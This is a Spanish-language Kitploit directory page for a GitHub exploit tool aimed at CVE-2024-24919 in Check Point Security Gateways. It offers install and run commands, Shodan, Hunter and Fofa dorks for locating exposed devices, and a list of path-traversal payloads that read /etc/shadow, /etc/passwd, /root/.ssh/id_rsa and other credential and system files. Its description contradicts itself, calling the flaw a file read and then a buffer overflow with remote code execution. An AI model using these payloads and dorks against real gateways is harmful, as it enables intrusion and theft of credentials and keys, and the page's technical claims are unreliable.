Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-24919 — CVE-2024-24919 exploit | Kitploit
Herramientas/GitHubGitHub/goatsecurity/cve-2024-24919
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

CVE-2024-24919 exploit

Ver Repositorio
2011hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Check Point Security Gateway RCE Exploit Tool (CVE-2024-24919)

Resumen

Este repositorio contiene una herramienta para explotar la vulnerabilidad CVE-2024-24919 en Check Point Security Gateways. La herramienta es un multi-escáner que puede identificar dispositivos vulnerables y un exploit de un solo objetivo que puede tomar el control total del dispositivo afectado.

CVE-2024-24919 es una vulnerabilidad de divulgación de información de alta gravedad que permite a un atacante leer archivos arbitrarios de forma remota en un Check Point Security Gateway. Esta vulnerabilidad puede ser explotada para robar información sensible, como contraseñas y archivos de configuración.

Descargo de responsabilidad:

Esta herramienta se proporciona únicamente con fines educativos. No debe utilizarse para atacar sistemas vulnerables sin el consentimiento explícito del propietario. Los autores de esta herramienta no son responsables de los daños que puedan derivarse de su uso.

Cómo funciona

El exploit funciona enviando una solicitud HTTP especialmente diseñada al dispositivo vulnerable. La solicitud desencadena un desbordamiento de búfer en el firmware del dispositivo, lo que permite al atacante ejecutar código arbitrario. El exploit puede usarse luego para tomar el control total del dispositivo.

Requisitos

  • Python 3
  • colorama
  • requests

Instalación

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

Uso

¡Puedes escanear un solo objetivo o varios!

root@kitploit:~
python cve-2024-24919.py

**Dorks **

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

** Captura de pantalla de la herramienta **

ss

$ Rutas de la herramienta : ```

root@kitploit:~
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
Descargar herramienta